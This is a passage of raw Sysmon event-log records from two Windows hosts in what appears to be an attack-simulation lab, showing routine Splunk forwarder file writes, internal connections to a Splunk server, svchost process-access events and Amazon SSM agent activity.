Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53396A2536985A13EC3A8CE3BE71898C,SHA256=BDECF3B68A1DF56A70D49411DF11CD416BB6639D9244375E4223F801A3ADB727,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:28.872{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AB18C2AA6DFF5C10A59F5684230897F,SHA256=3C6AAFE1BECFEC5470F35A71F3D1DEECCC9629D7AAFC781350171A21B70E15C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:28.489{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3571FB1D69801C3AC0D4CC5567365D9,SHA256=0160B2A6F900976245E51CDA59281481956CBD916C757F32272F73997319A299,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:27.663{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51206-false10.0.1.12-8000- 23542300x8000000000000000214664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:29.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDBDDDB9788E77DDC7E3BCA86C492D5A,SHA256=D63E55AA912423CFDFCFBDD8B97F235B3D5FFD3E782516EBFBFF96B5F7BDC224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:30.507{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA8AF1F74DFEA8BFA04EC97B220DB81A,SHA256=E08ABA209C5106F8B74CF2A0B8628B37A9DE76B8B10B8CDBB3EB4BCEFFEE9207,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:29.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14C6A650CFC94963C8420E50A15A84EE,SHA256=5E3070A66B93CDD24BBF7E02A42311CB28F6DE0CF5B2A216DC8FC4D718B20051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:30.239{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=269CFBDEC90468D3665C4A105C7804CF,SHA256=20D7C66C14E639999531E29DAF1F4FE26B8F4BA8B52953F402475716AF9E4CF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:31.520{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9813237D6FA77F442263087FD3EBAA,SHA256=DB10791A370B725B693B59B6C517D138B8C6E2333A96D5EB4AF5FB39E2B11DC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:31.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CAB7E477915F95AFABE8F51D5D5A171,SHA256=23827C0DA08C21A35CA4936B3A738A1822E443E251E97EC8B4FB7CC781426311,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:32.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:32.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:32.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:32.535{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A91692839BE684932FA845F2C78A1A2,SHA256=1633B2FA2D560B44DDA67D59A40201B3517E05C144511629F3F0C7161F274213,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:29.551{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53268-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:32.059{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F02A40F7E732FE7F2261667CF9C52B0F,SHA256=66A0086F12A46F3460129EC15012A6FC28276FF5393BF9527D6D6EEF134E2876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:33.278{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C091E4E468F09D2BF662A18C0D674EAD,SHA256=F0F3FA5D6562D6C41FC2EAC98D962C9D120FB0D05B95481A969D1F5A954C2433,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:33.122{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEDF2357BB973404DC4E605D24B3E241,SHA256=AC5829844C33BD3C87D7D60D18D66EFB6BF8DB0FAE80931020EE745E730EC0C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:33.536{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C6804EECC0CF6EFDEC30B20174BF23,SHA256=067F7AAAECDE7A3B348B87D461DE144A10CAA97A1499410751A7316CE80BC3E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:34.551{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EF39A3D40795E99FB28F08153A1A2F4,SHA256=BFB4CA5138CDA48C6557BB78FB756E20A9A2709667187BDE07B35FE1D4B823F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:34.200{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32FFE7D0338EAA9847978A50BC35BEE2,SHA256=790BE8C24F8F8B8DE37FA56402C5F8A0C0D8495F9C8BD9055426CA35A307415B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:35.567{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FD7BFBAC6F05801512DC1F77983086,SHA256=AE232835A9F39CD1EEAC0CB7F11CE377443FFA056A4BDF20F09EE3F7B285F684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:35.216{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A155E736A9DB2AB4111FA5A8347C9351,SHA256=F3D1BAFA9937D0FFAD750F1ED76D91158B65D74DDB64A20CF5F6E7DC94D875FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:36.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F915261B7750AD12F16C7AFC8908837,SHA256=8117CFCD60F1387CDFB8BA3D3FA04EE53CA4546B35C803815997AD00CB8534AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:36.247{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E8E37C8E3146AAC576D3916BC5CB115,SHA256=98DB7CFE30422E6224903F3229DD1B6516E48BB073545D085989F054281E2035,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:33.678{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51207-false10.0.1.12-8000- 23542300x8000000000000000214678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:37.848{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B6C3BBF66D0A54A24BF1AE6D4E1344F,SHA256=E34564B058041ABDC6F83C0744FF699E37A0C0A9E7A37478592BB1AF6443C622,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:34.707{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53269-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:37.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12A4287784F7003D7DB3C01FEAEFCD0C,SHA256=4892C3BC5A7537DBB6EF4A292C6EBC0C3E61CE7150C22BBEE66D7CD8034B71AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:38.356{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D914B1FEC1431EB338969730EB187A4,SHA256=A067ED183721AAAB1FAB961B786AB2C2DA419851939383158D8B3A0CDBEB712C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:39.497{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:39.403{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABAB7B2426DEB1BE36B3FA666C9746E6,SHA256=D85D99DA144D42D2A1BA6187C6E4455DDBF5C6023B63DE2D0B4C93E0DBA53AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:39.067{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F137874D7DE24C7472A8C0EEAB32A0,SHA256=21B5ECF45B77F3BA4E3C4F6E698B6192758AEBDDC043463B8CC80A899159B219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:40.419{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4ECDFADA5C9328F00DBB7F3EF60A4FD,SHA256=2E610506514539F36220F39FB8B6B7CE2D257DC6443E417E6F2F300FF288F564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:40.317{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13506760FAD0C4AA128C295AA27E642A,SHA256=1F3DD4ADBDF428728B547E52778DA210032CC9407803C8D9E2C75EA69BBC2A35,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:39.723{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53271-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000285604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:38.960{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53270-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000285603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:41.434{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B886FDB8CB303909B9B66B5F15A25F,SHA256=96164C05ACB36E5AEBE82CE22F4DABADAD5265C025F9493F9BB542B12B513D4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:41.478{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-123MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:41.477{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E125DB5B726F70EB6B22B78EC8339843,SHA256=CECD99C55CB779F22C4888EF528A4DB5D15CEBF981E84B99DF290B15007B3EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:42.513{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D342883BFDBE146E7DD0FBCC7E8FEA94,SHA256=2B120811B183A074F6CE6B800812EBF2B6342D32CD9F9A1BF83E4DA9CCA24BF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:42.499{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13AB0F152457697DBF560E21609DC6EF,SHA256=77EBFBA24B5DFC61391BD3611AEEDE1CDE8206D26687173D004E781000FFE6B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:42.492{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-124MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:39.647{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51208-false10.0.1.12-8000- 23542300x8000000000000000285607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:43.575{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CD62AB3DC942A8982D81BA6DE872CAE,SHA256=9E4FEAEF664EDFB01837FAB6685F0C2D4140E41BF580827CD37710F6DB588732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:43.506{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F78B9E5987D7FD0A1D36A9A4A3980D2,SHA256=06143EF005D74684B677DE92F81E5713422048A00F091FECB3A55D8E90F59267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:44.747{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BAEB955DE266D14FBB0364AE93655F,SHA256=2B5DB15F9DCE4E798757F09C548B712E17B9210E39C115897A371C91E7618D8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:44.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AAF2462A89A2E8480E90B5383458E64,SHA256=4E8B03E1E7DD0127E31D1D1F345686D054EDA857884DAF97F87BAECFE70C3F6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:45.747{C8EA50B7-F144-6215-7700-000000003802}3964NT 